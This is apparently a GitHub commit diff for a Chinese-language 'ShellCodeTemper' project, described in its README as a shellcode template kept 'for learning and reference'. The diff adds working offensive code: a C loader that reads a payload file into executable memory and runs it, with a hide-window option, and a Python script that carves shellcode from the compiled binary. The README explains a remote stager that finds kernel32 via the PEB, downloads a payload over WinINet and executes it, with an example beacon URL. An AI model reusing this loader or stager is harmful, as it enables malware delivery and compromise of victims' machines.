INotGreen
diff --git a/‎.gitignore‎
Lines changed: 1 addition & 0 deletions b/‎.gitignore‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎Patch/File_Read.c‎
Lines changed: 49 additions & 0 deletions b/‎Patch/File_Read.c‎
Lines changed: 49 additions & 0 deletions
diff --git a/‎Patch/Patch.py‎
Lines changed: 9 additions & 0 deletions b/‎Patch/Patch.py‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎README.md‎
Lines changed: 69 additions & 0 deletions b/‎README.md‎
Lines changed: 69 additions & 0 deletions
diff --git a/‎shellcodeCode/packages.config‎
Lines changed: 0 additions & 1 deletion b/‎shellcodeCode/packages.config‎
Lines changed: 0 additions & 1 deletion
diff --git a/‎shellcodeCode/shellcodeCode.vcxproj‎
Lines changed: 0 additions & 2 deletions b/‎shellcodeCode/shellcodeCode.vcxproj‎
Lines changed: 0 additions & 2 deletions
diff --git a/‎shellcodeCode/x64/Release/shellcodeCode.log‎
Lines changed: 5 additions & 24 deletions b/‎shellcodeCode/x64/Release/shellcodeCode.log‎
Lines changed: 5 additions & 24 deletions
diff --git a/‎shellcodeCode/x64/Release/shellcodeCode.obj‎
5.44 KB b/‎shellcodeCode/x64/Release/shellcodeCode.obj‎
5.44 KB
diff --git a/‎shellcodeCode/x64/Release/shellcodeTemper.Build.CppClean.log‎
Lines changed: 18 additions & 4 deletions b/‎shellcodeCode/x64/Release/shellcodeTemper.Build.CppClean.log‎
Lines changed: 18 additions & 4 deletions
diff --git a/‎shellcodeCode/x64/Release/shellcodeTemper.exe.recipe‎
Lines changed: 1 addition & 1 deletion b/‎shellcodeCode/x64/Release/shellcodeTemper.exe.recipe‎
Lines changed: 1 addition & 1 deletion
@@ -5,3 +5,4 @@
 /.vs/ShellCodeTemper
 /packages
 /Release
+/.git
@@ -0,0 +1,49 @@
+#define _CRT_SECURE_NO_WARNINGS
+#include <Windows.h>
+
+//#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
+#include <stdlib.h>
+#include <stdio.h>
+
+void HideWindow()
+{
+    HWND hwnd = GetForegroundWindow(); 
+    if (hwnd)
+    {
+        ShowWindow(hwnd, SW_HIDE); 
+    }
+}
+int RUN()
+{
+    FILE* fp;
+    size_t size;
+    unsigned char* buffer;
+    char exePath[MAX_PATH];
+    GetModuleFileName(NULL, exePath, MAX_PATH);
+
+    char* lastSlash = strrchr(exePath, '\\');
+    if (lastSlash) {
+        *(lastSlash + 1) = '\0';
+    }
+    char fullPath[MAX_PATH];
+    snprintf(fullPath, sizeof(fullPath), "%sa.bin", exePath);
+    printf(fullPath);
+    fp = fopen(fullPath, "rb");
+    fseek(fp, 0, SEEK_END);
+    size = ftell(fp);
+    fseek(fp, 0, SEEK_SET);
+    buffer = (unsigned char*)malloc(size);
+    fread(buffer, size, 1, fp);
+    fclose(fp);  
+    void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+    memcpy(exec, buffer, size);
+    ((void(*)())exec)();
+    VirtualFree(exec, 0, MEM_RELEASE);
+    free(buffer);
+    return 0;
+}
+
+int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
+{//HideWindow();
+    RUN();
+}
@@ -0,0 +1,9 @@
+import random
+
+def extract():
+    with open('shellcodeCode.exe','rb+') as file:
+        with open('shellcode.bin', 'wb+') as save:
+            save.write(bytes(file.read()[0x400:0x7D0]))
+       
+if __name__ == '__main__':
+    extract()
@@ -0,0 +1,69 @@
+
+
+
+
+
+
+两年前用于制作shellcode的模板，仅用于学习和参考
+
+## 特征
+
+1. **动态加载系统库和函数**
+
+   使用 `LoadLibraryA` 和 `GetProcAddress` 动态加载 `kernel32.dll` 和 `wininet.dll`，获取一些网络相关的函数。
+
+2. **通过 PEB 获取 Kernel32.dll 基址**
+
+   不同于直接调用 Windows API，它通过访问 PEB（进程环境块）来查找 Kernel32.dll 的地址。
+
+3. **支持 x64 和 x86 架构**
+
+   使用条件编译 (`_AMD64_`) 根据平台的不同使用不同的方式获取 DLL 和导出表地址。
+
+4. **动态获取导出函数的地址**
+
+   代码实现了一个 `GetProcAddress_Func` 函数，遍历 DLL 的导出表，找到所需的函数。
+
+5. **动态堆内存读写**
+
+   远程服务器下载内容，并将其存储在分配的内存区域中。通过指针运算将
+
+   `addr + total_bytes` 写入指定内存的偏移位置。
+
+6.  **加载和调用网络及内存相关的函数**
+
+   使用 `InternetOpenA`、`InternetOpenUrlA`、`InternetReadFile` 等网络 API。
+
+   使用 `VirtualAlloc` 和 `VirtualProtect` 进行内存管理，分配和更改内存区域的保护属性，使用指针 执行Shellcode。
+
+   
+
+## 说明
+
+1.编译出来的exe，可以直接当作stager使用（远程shellcode加载器）
+
+2.提取shellcode：
+
+偏移量从0x400到0x7D0为.Text段的内容，用python脚本将这段内容提取出来
+
+```python
+import random
+
+def extract():
+    with open('shellcodeCode.exe','rb+') as file:
+        with open('shellcode.bin', 'wb+') as save:
+            save.write(bytes(file.read()[0x400:0x7D0]))
+       
+if __name__ == '__main__':
+    extract()
+
+```
+
+URL只允许BYTE的字符数组形式的字符串，类似于这样：
+
+```C++
+ BYTE url[] = { 'h', 't', 't', 'p', ':', '/', '/', '1', '2', '7', '.', '0', '.', '0', '.', '1', ':', '8', '1', '8', '1', '/', 'b', 'e', 'a', 'c', 'o', 'n', 0 };
+```
+
+- 每个字符都用单引号 `''` 包裹，逐个字符作为 `BYTE`（即 `unsigned char`）存储在数组中。
+- **字符串以 0 结尾**（即 **空字符 `0`**），这是 C 语言中的字符串终止符，标志字符串结束。
@@ -1,5 +1,4 @@
 <?xml version="1.0" encoding="utf-8"?>
 <packages>
-  <package id="VC-LTL" version="5.0.9" targetFramework="native" />
   <package id="YY.NuGet.Import.Helper" version="1.0.0.4" targetFramework="native" />
 </packages>
@@ -1,6 +1,5 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <Import Project="..\packages\VC-LTL.5.0.9\build\native\VC-LTL.props" Condition="Exists('..\packages\VC-LTL.5.0.9\build\native\VC-LTL.props')" />
   <Import Project="..\packages\YY.NuGet.Import.Helper.1.0.0.4\build\native\YY.NuGet.Import.Helper.props" Condition="Exists('..\packages\YY.NuGet.Import.Helper.1.0.0.4\build\native\YY.NuGet.Import.Helper.props')" />
   <ItemGroup Label="ProjectConfigurations">
     <ProjectConfiguration Include="Debug|Win32">
@@ -178,6 +177,5 @@
     </PropertyGroup>
     <Error Condition="!Exists('..\packages\YY.NuGet.Import.Helper.1.0.0.4\build\native\YY.NuGet.Import.Helper.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\YY.NuGet.Import.Helper.1.0.0.4\build\native\YY.NuGet.Import.Helper.props'))" />
     <Error Condition="!Exists('..\packages\YY.NuGet.Import.Helper.1.0.0.4\build\native\YY.NuGet.Import.Helper.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\YY.NuGet.Import.Helper.1.0.0.4\build\native\YY.NuGet.Import.Helper.targets'))" />
-    <Error Condition="!Exists('..\packages\VC-LTL.5.0.9\build\native\VC-LTL.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\VC-LTL.5.0.9\build\native\VC-LTL.props'))" />
   </Target>
 </Project>
@@ -1,28 +1,9 @@
-  
-    ################################################################################
-    #                                                                              #
-    #     8b           d8  ,ad8888ba,         88     888888888888 88               #
-    #     `8b         d8' d8"'    `"8b        88          88      88               #
-    #      `8b       d8' d8'                  88          88      88               #
-    #       `8b     d8'  88                   88          88      88               #
-    #        `8b   d8'   88          aaaaaaaa 88          88      88               #
-    #         `8b d8'    Y8,         """""""" 88          88      88               #
-    #          `888'      Y8a.    .a8P        88          88      88               #
-    #           `8'        `"Y8888Y"'         88888888888 88      88888888888      #
-    #                                                                              #
-    ################################################################################
-  
-    VC-LTL Path      : D:\WechatFile\WeChat Files\wxid_g4eflqyybtgp22\FileStorage\File\2023-03\shellcodeCode\shellcodeCode\packages\VC-LTL.5.0.9\build\native\
-    VC Tools Version : 14.35.32215
-    WindowsTargetPlatformMinVersion : 6.0.6000.0
-    Platform         : x64
-  
-C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v170\Microsoft.CppBuild.targets(517,5): warning MSB8028: 中间目录(x64\Release\)包含从另一个项目(shellcodeCode.vcxproj)共享的文件。   这会导致错误的清除和重新生成行为。
+C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v170\Microsoft.CppBuild.targets(531,5): warning MSB8028: 中间目录(x64\Release\)包含从另一个项目(shellcodeCode.vcxproj)共享的文件。   这会导致错误的清除和重新生成行为。
   shellcodeCode.cpp
   正在生成代码
   Previous IPDB not found, fall back to full compilation.
-D:\WechatFile\WeChat Files\wxid_g4eflqyybtgp22\FileStorage\File\2023-03\shellcodeCode\shellcodeCode\shellcodeCode\head.h(226): warning C4715: “GetKernel32DLL”: 不是所有的控件路径都返回值
-D:\WechatFile\WeChat Files\wxid_g4eflqyybtgp22\FileStorage\File\2023-03\shellcodeCode\shellcodeCode\shellcodeCode\head.h(249): warning C4715: “GetProcAddress_Func”: 不是所有的控件路径都返回值
-  All 4 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+C:\Users\admin\Desktop\code\ShellCodeTemper\shellcodeCode\head.h(226): warning C4715: “GetKernel32DLL”: 不是所有的控件路径都返回值
+C:\Users\admin\Desktop\code\ShellCodeTemper\shellcodeCode\head.h(249): warning C4715: “GetProcAddress_Func”: 不是所有的控件路径都返回值
+  All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
   已完成代码的生成
-  shellcodeCode.vcxproj -> D:\WechatFile\WeChat Files\wxid_g4eflqyybtgp22\FileStorage\File\2023-03\shellcodeCode\shellcodeCode\x64\Release\shellcodeTemper.exe
+  shellcodeCode.vcxproj -> C:\Users\admin\Desktop\code\ShellCodeTemper\x64\Release\shellcodeTemper.exe
@@ -1,4 +1,18 @@
-d:\wechatfile\wechat files\wxid_g4eflqyybtgp22\filestorage\file\2023-03\shellcodecode\shellcodecode\shellcodecode\x64\release\shellcodecode.obj
-d:\wechatfile\wechat files\wxid_g4eflqyybtgp22\filestorage\file\2023-03\shellcodecode\shellcodecode\shellcodecode\x64\release\shellcodecode.ipdb
-d:\wechatfile\wechat files\wxid_g4eflqyybtgp22\filestorage\file\2023-03\shellcodecode\shellcodecode\shellcodecode\x64\release\shellcodecode.iobj
-d:\wechatfile\wechat files\wxid_g4eflqyybtgp22\filestorage\file\2023-03\shellcodecode\shellcodecode\shellcodecode\x64\release\vc143.pdb
+c:\users\admin\desktop\shellcodetemper\shellcodecode\x64\release\vc143.pdb
+c:\users\admin\desktop\shellcodetemper\shellcodecode\x64\release\shellcodecode.obj
+c:\users\admin\desktop\shellcodetemper\x64\release\shellcodetemper.exe
+c:\users\admin\desktop\shellcodetemper\shellcodecode\x64\release\shellcodetemper.ipdb
+c:\users\admin\desktop\shellcodetemper\shellcodecode\x64\release\shellcodetemper.iobj
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodecode.obj
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.ipdb
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.iobj
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\vc143.pdb
+c:\users\admin\desktop\code\shellcodetemper\x64\release\shellcodetemper.exe
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.tlog\cl.command.1.tlog
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.tlog\cl.items.tlog
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.tlog\cl.read.1.tlog
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.tlog\cl.write.1.tlog
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.tlog\link.command.1.tlog
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.tlog\link.read.1.tlog
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.tlog\link.secondary.1.tlog
+c:\users\admin\desktop\code\shellcodetemper\shellcodecode\x64\release\shellcodetemper.tlog\link.write.1.tlog
@@ -2,7 +2,7 @@
 <Project>
   <ProjectOutputs>
     <ProjectOutput>
-      <FullPath>D:\WechatFile\WeChat Files\wxid_g4eflqyybtgp22\FileStorage\File\2023-03\shellcodeCode\shellcodeCode\x64\Release\shellcodeTemper.exe</FullPath>
+      <FullPath>C:\Users\admin\Desktop\code\ShellCodeTemper\x64\Release\shellcodeTemper.exe</FullPath>
     </ProjectOutput>
   </ProjectOutputs>
   <ContentFiles />